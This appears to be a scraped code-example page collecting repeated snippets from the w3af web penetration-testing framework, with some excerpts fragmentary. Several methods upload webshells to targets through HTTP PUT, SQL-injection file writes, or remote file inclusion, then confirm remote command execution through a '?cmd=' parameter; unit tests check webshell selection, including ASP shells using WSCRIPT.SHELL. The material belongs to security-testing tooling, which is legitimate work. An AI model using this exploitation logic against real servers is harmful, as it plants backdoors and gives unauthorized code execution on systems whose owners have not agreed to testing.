Ejemplo n.º 1
    def _create_file(self, extension):
        Create a file with a webshell as content.

        :return: Name of the file that was created.
        # Get content
        file_content, real_extension = shell_handler.get_webshells(
            extension, force_extension=True)[0]
        if extension == '':
            extension = real_extension

        # Open target
        temp_dir = get_temp_dir()
        low_level_fd, path_name = tempfile.mkstemp(prefix='w3af_',
                                                   suffix='.' + extension,
        file_handler = os.fdopen(low_level_fd, "w+b")

        # Write content to target

        path, file_name = os.path.split(path_name)
        return path, file_name
Ejemplo n.º 2
    def test_get_web_shell_code_extension_force(self):
        shells = get_webshells("php", True)

        # Only one returned since we're forcing the extension
        self.assertEqual(len(shells), 1)
        php_shell_code, lang = shells[0]

        self.assertEqual(lang, "php")
        self.assertIn("echo ", php_shell_code)
Ejemplo n.º 3
    def test_get_web_shell_code_extension_force(self):
        shells = get_webshells('php', True)

        # Only one returned since we're forcing the extension
        self.assertEqual(len(shells), 1)
        php_shell_code, lang = shells[0]

        self.assertEqual(lang, 'php')
        self.assertIn('echo ', php_shell_code)
Ejemplo n.º 4
    def test_get_web_shell_extension(self):
        shells = get_webshells('php')

        self.assertEqual(len(shells), 6)
        # The first one is PHP since we asked for it when we passed PHP as
        # parameter
        php_shell_code, lang = shells[0]

        self.assertEqual(lang, 'php')
        self.assertIn('echo ', php_shell_code)
Ejemplo n.º 5
    def test_get_web_shell_extension(self):
        shells = get_webshells("php")

        self.assertEqual(len(shells), 6)
        # The first one is PHP since we asked for it when we passed PHP as
        # parameter
        php_shell_code, lang = shells[0]

        self.assertEqual(lang, "php")
        self.assertIn("echo ", php_shell_code)
Ejemplo n.º 6
    def _verify_vuln(self, vuln_obj):
        This command verifies a vuln. This is really hard work! :P

        :return : True if vuln can be exploited.
        # Create the shell
        filename = rand_alpha(7)
        extension = vuln_obj.get_url().get_extension()

        # I get a list of tuples with file_content and extension to use
        shell_list = shell_handler.get_webshells(extension)

        for file_content, real_extension in shell_list:
            if extension == '':
                extension = real_extension
            om.out.debug('Uploading shell with extension: "%s".' % extension)

            # Upload the shell
            fname = '%s.%s' % (filename, extension)
            url_to_upload = vuln_obj.get_url().url_join(fname)

                'Uploading file %s using PUT method.' % url_to_upload)
            self._uri_opener.PUT(url_to_upload, data=file_content)

            # Verify if I can execute commands
            # All w3af shells, when invoked with a blank command, return a
            # specific value in the response:
            # shell_handler.SHELL_IDENTIFIER
            exploit_url = URL(url_to_upload + '?cmd=')
            response = self._uri_opener.GET(exploit_url)

            if shell_handler.SHELL_IDENTIFIER in response.get_body():
                msg = 'The uploaded shell returned the SHELL_IDENTIFIER, which'\
                      ' verifies that the file was uploaded and is being executed.'
                self._exploit_url = exploit_url
                return True
                msg = 'The uploaded shell with extension: "%s" did NOT return'\
                      ' the SHELL_IDENTIFIER, which means that the file was not'\
                      ' uploaded to the remote server or the code is not being'\
                      ' run. The returned body was: "%s".' % (extension,
                extension = ''
Ejemplo n.º 7
    def _verify_vuln(self, vuln_obj):
        This command verifies a vuln. This is really hard work! :P

        :return : True if vuln can be exploited.
        # Create the shell
        filename = rand_alpha(7)
        extension = vuln_obj.get_url().get_extension()

        # I get a list of tuples with file_content and extension to use
        shell_list = shell_handler.get_webshells(extension)

        for file_content, real_extension in shell_list:
            if extension == '':
                extension = real_extension
            om.out.debug('Uploading shell with extension: "%s".' % extension)

            # Upload the shell
            fname = '%s.%s' % (filename, extension)
            url_to_upload = vuln_obj.get_url().url_join(fname)

            om.out.debug('Uploading file %s using PUT method.' % url_to_upload)
            self._uri_opener.PUT(url_to_upload, data=file_content)

            # Verify if I can execute commands
            # All w3af shells, when invoked with a blank command, return a
            # specific value in the response:
            # shell_handler.SHELL_IDENTIFIER
            exploit_url = URL(url_to_upload + '?cmd=')
            response = self._uri_opener.GET(exploit_url)

            if shell_handler.SHELL_IDENTIFIER in response.get_body():
                msg = 'The uploaded shell returned the SHELL_IDENTIFIER, which'\
                      ' verifies that the file was uploaded and is being executed.'
                self._exploit_url = exploit_url
                return True
                msg = 'The uploaded shell with extension: "%s" did NOT return'\
                      ' the SHELL_IDENTIFIER, which means that the file was not'\
                      ' uploaded to the remote server or the code is not being'\
                      ' run. The returned body was: "%s".' % (extension,
                extension = ''
Ejemplo n.º 8
    def test_with_kb_data(self):
        kb.kb.raw_write("server_header", "powered_by_string", ["ASP foo bar"])

        shells = get_webshells("")

        # TODO: The shells list has duplicates, fix in the future. Not really a
        #       big issue since it would translate into 1 more HTTP request and
        #       only in the cases where the user is exploiting something
        self.assertEqual(len(shells), 7)

        # The first one is ASP since we're scanning (according to the KB) an
        # ASP site
        asp_shell_code, lang = shells[0]

        self.assertEqual(lang, "asp")
        self.assertIn("WSCRIPT.SHELL", asp_shell_code)

Ejemplo n.º 9
    def _verifyVuln( self, vuln_obj ):
        This command verifies a vuln. This is really hard work! :P

        @return : True if vuln can be exploited.
        # Create the shell
        filename = createRandAlpha( 7 )
        extension = vuln_obj.getURL().getExtension()
        # I get a list of tuples with file_content and extension to use
        shell_list = shell_handler.get_webshells( extension )
        for file_content, real_extension in shell_list:
            if extension == '':
                extension = real_extension
            om.out.debug('Uploading shell with extension: "'+extension+'".' )
            # Upload the shell
            url_to_upload = vuln_obj.getURL().urlJoin( filename + '.' + extension )
            om.out.debug('Uploading file: ' + url_to_upload )
            self._urlOpener.PUT( url_to_upload, data=file_content )
            # Verify if I can execute commands
            # All w3af shells, when invoked with a blank command, return a 
            # specific value in the response:
            # shell_handler.SHELL_IDENTIFIER
            exploit_url = url_object( url_to_upload + '?cmd=' )
            response = self._urlOpener.GET( exploit_url )
            if shell_handler.SHELL_IDENTIFIER in response.getBody():
                msg = 'The uploaded shell returned the SHELL_IDENTIFIER: "'
                msg += shell_handler.SHELL_IDENTIFIER + '".'
                om.out.debug( msg )
                self._exploit_url = exploit_url
                return True
                msg = 'The uploaded shell with extension: "' + extension
                msg += '" DIDN\'T returned what we expected, it returned: ' + response.getBody()
                om.out.debug( msg )
                extension = ''
Ejemplo n.º 10
    def test_with_kb_data(self):
        kb.kb.raw_write('server_header', 'powered_by_string', [
            'ASP foo bar',

        shells = get_webshells('')

        # TODO: The shells list has duplicates, fix in the future. Not really a
        #       big issue since it would translate into 1 more HTTP request and
        #       only in the cases where the user is exploiting something
        self.assertEqual(len(shells), 7)

        # The first one is ASP since we're scanning (according to the KB) an
        # ASP site
        asp_shell_code, lang = shells[0]

        self.assertEqual(lang, 'asp')
        self.assertIn('WSCRIPT.SHELL', asp_shell_code)

Ejemplo n.º 11
    def _create_file( self, extension ):
        Create a file with a webshell as content.
        @return: Name of the file that was created.
        # Get content
        file_content, real_extension = shell_handler.get_webshells( extension, forceExtension=True )[0]
        if extension == '':
            extension = real_extension

        # Open target
        temp_dir = get_temp_dir()
        low_level_fd, self._path_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + extension, dir=temp_dir)
        file_handler = os.fdopen(low_level_fd, "w+b")
        # Write content to target
        _path, self._file_name = os.path.split(self._path_name)
        return self._path_name
Ejemplo n.º 12
    def _create_file(self, extension):
        Create a file with a webshell as content.

        :return: Name of the file that was created.
        # Get content
        file_content, real_extension = shell_handler.get_webshells(extension, force_extension=True)[0]
        if extension == "":
            extension = real_extension

        # Open target
        temp_dir = get_temp_dir()
        low_level_fd, path_name = tempfile.mkstemp(prefix="w3af_", suffix="." + extension, dir=temp_dir)
        file_handler = os.fdopen(low_level_fd, "w+b")

        # Write content to target

        path, file_name = os.path.split(path_name)
        return path, file_name
Ejemplo n.º 13
Archivo: rfi.py Proyecto: HamzaKo/w3af
    def _verify_vuln(self, vuln):
        This command verifies a vuln. This is really hard work!

        :return : True if vuln can be exploited.
        extension = vuln.get_url().get_extension()

        # I get a list of tuples with file_content and extension to use
        shell_list = shell_handler.get_webshells(extension)

        for file_content, real_extension in shell_list:
            #    This for loop aims to exploit the RFI vulnerability and get remote
            #    code execution.
            if extension == '':
                extension = real_extension

            url_to_include = self._gen_url_to_include(file_content, extension)

            # Prepare for exploitation...
            function_reference = getattr(self._uri_opener, vuln.get_method())
            data_container = vuln.get_dc()
            data_container[vuln.get_var()] = url_to_include

                http_res = function_reference(vuln.get_url(),
                if shell_handler.SHELL_IDENTIFIER in http_res.body:
                    self._exploit_dc = data_container
                    return SUCCESS_COMPLETE
                    # Remove the file from the local webserver webroot


            #  We get here when it was impossible to create a RFI shell, but we
            #  still might be able to do some interesting stuff through error
            #  messages shown by the web application  
            function_reference = getattr(self._uri_opener, vuln.get_method())
            data_container = vuln.get_dc()

            #    A port that should "always" be closed,
            data_container[vuln.get_var()] = 'http://localhost:92/'

                http_response = function_reference(
                    vuln.get_url(), str(data_container))
                return False
                rfi_errors = ['php_network_getaddresses: getaddrinfo',
                              'failed to open stream: Connection refused in']
                for error in rfi_errors:
                    if error in http_response.get_body():
                        return SUCCESS_OPEN_PORT

        return NO_SUCCESS
Ejemplo n.º 14
    def _upload_webshell(self, driver, vuln_obj):
        First, upload any file to the target webroot.
        Once I've found the target webroot (or any other location inside the webroot where I can
        write a file) try to upload a webshell and test for execution.
        @parameter driver: The database driver to use in order to upload the file.
        @parameter vuln_obj: The vulnerability that we are exploiting.
        @return: The webshell URL if the webshell was uploaded, or None if the process failed.
        upload_success = False
        # First, we test if we can upload a file into a directory we can access:
        webroot_dirs = get_webroot_dirs( urlParser.getDomain(vuln_obj.getURL()) )
        for webroot in webroot_dirs:
            if upload_success: break
            # w3af found a lot of directories, and we are going to use that knowledgeBase
            # because one of the dirs may be writable and one may not!
            for path in self._get_site_directories():
                # Create the remote_path
                remote_path = webroot + '/' + path
                # Create the filename
                remote_filename = createRandAlNum( 8 ) + '.' + createRandAlNum(3)
                remote_path += '/' + remote_filename
                # And just in case... remove double slashes
                for i in xrange(3): remote_path = remote_path.replace('//', '/')
                # Create the content (which will also act as the test_string)
                test_string = content = createRandAlNum(16)
                # Create the test URL
                test_url = urlParser.urlJoin(vuln_obj.getURL(), path + '/' + remote_filename )

                if self._upload_file( driver, remote_path, content, test_url, test_string):
                    upload_success = True
                    om.out.console('Successfully wrote a file to the webroot.')
        # We can upload files, and we know where they are uploaded, now we
        # just need to upload a webshell that works in that environment!
        if upload_success:
            om.out.console('Trying to write a webshell.')
            # Get the extension from the vulnerable script
            extension = urlParser.getExtension( vuln_obj.getURL() )
            for file_content, real_extension in shell_handler.get_webshells( extension ):
                # Create the variables to upload the file, based on the success of the
                # previous for loop:
                remote_path = remote_path[:remote_path.rfind('/')]
                filename = createRandAlNum( 8 )
                remote_path += '/' + filename + '.' + real_extension
                # And now do "the same thing" with the URL
                test_url = test_url[:test_url.rfind('/')]
                test_url += '/' + filename + '.' + real_extension + '?cmd='
                # Upload & test
                if self._upload_file( driver, remote_path, file_content, test_url, shell_handler.SHELL_IDENTIFIER):
                    # Complete success!
                    om.out.console('Successfully installed a webshell in the target server!')
                    return test_url
        return None
    def _verifyVuln(self, vuln):
        This command verifies a vuln. This is really hard work!

        @return : True if vuln can be exploited.
        # Create the shell
        extension = urlParser.getExtension( vuln.getURL() )
        # I get a list of tuples with file_content and extension to use
        shell_list = shell_handler.get_webshells( extension )
        for file_content, real_extension in shell_list:
            #    This for loop aims to exploit the RFI vulnerability and get remote
            #    code execution.
            if extension == '':
                extension = real_extension

            url_to_include = self._gen_url_to_include(file_content, extension)

            # Start local webserver
            webroot_path = os.path.join(get_home_dir(), 'webroot')
            webserver.start_webserver(self._listen_address, self._listen_port,
            # Prepare for exploitation...
            function_reference = getattr(self._urlOpener, vuln.getMethod())
            data_container = vuln.getDc()
            data_container[vuln.getVar()] = url_to_include

                http_res = function_reference(vuln.getURL(), str(data_container))
                successfully_exploited = False
                successfully_exploited = self._define_exact_cut(

            if successfully_exploited:
                self._exploit_dc = data_container
                return SUCCESS_COMPLETE
                # Remove the file from the local webserver webroot
            #    We get here when it was impossible to create a RFI shell, but we
            #    still might be able to do some interesting stuff
            function_reference = getattr( self._urlOpener , vuln.getMethod() )
            data_container = vuln.getDc()
            #    A port that should "always" be closed,
            data_container[ vuln.getVar() ] = 'http://localhost:92/'   

                http_response = function_reference( vuln.getURL(), str(data_container) )
                return False
                rfi_errors = ['php_network_getaddresses: getaddrinfo',
                                    'failed to open stream: Connection refused in']
                for error in rfi_errors:
                    if error in http_response.getBody():
                        return SUCCESS_OPEN_PORT
        return NO_SUCCESS
Ejemplo n.º 16
    def test_get_web_shell_code_invalid_extension(self):
        shells = get_webshells('123456')

        # All returned when invalid extension
        self.assertEqual(len(shells), 6)
Ejemplo n.º 17
Archivo: rfi.py Proyecto: daemon13/w3af
    def _verify_vuln(self, vuln):
        This command verifies a vuln. This is really hard work!

        :return : True if vuln can be exploited.
        extension = vuln.get_url().get_extension()

        # I get a list of tuples with file_content and extension to use
        shell_list = shell_handler.get_webshells(extension)

        for file_content, real_extension in shell_list:
            #    This for loop aims to exploit the RFI vulnerability and get remote
            #    code execution.
            if extension == '':
                extension = real_extension

            url_to_include = self._gen_url_to_include(file_content, extension)

            # Prepare for exploitation...
            function_reference = getattr(self._uri_opener, vuln.get_method())
            data_container = vuln.get_dc()
            data_container[vuln.get_var()] = url_to_include

                http_res = function_reference(vuln.get_url(),
                if shell_handler.SHELL_IDENTIFIER in http_res.body:
                    self._exploit_dc = data_container
                    return SUCCESS_COMPLETE
                    # Remove the file from the local webserver webroot


            #  We get here when it was impossible to create a RFI shell, but we
            #  still might be able to do some interesting stuff through error
            #  messages shown by the web application
            function_reference = getattr(self._uri_opener, vuln.get_method())
            data_container = vuln.get_dc()

            #    A port that should "always" be closed,
            data_container[vuln.get_var()] = 'http://localhost:92/'

                http_response = function_reference(vuln.get_url(),
                return False
                rfi_errors = [
                    'php_network_getaddresses: getaddrinfo',
                    'failed to open stream: Connection refused in'
                for error in rfi_errors:
                    if error in http_response.get_body():
                        return SUCCESS_OPEN_PORT

        return NO_SUCCESS
Ejemplo n.º 18
    def test_get_web_shell_code_invalid_extension(self):
        shells = get_webshells("123456")

        # All returned when invalid extension
        self.assertEqual(len(shells), 6)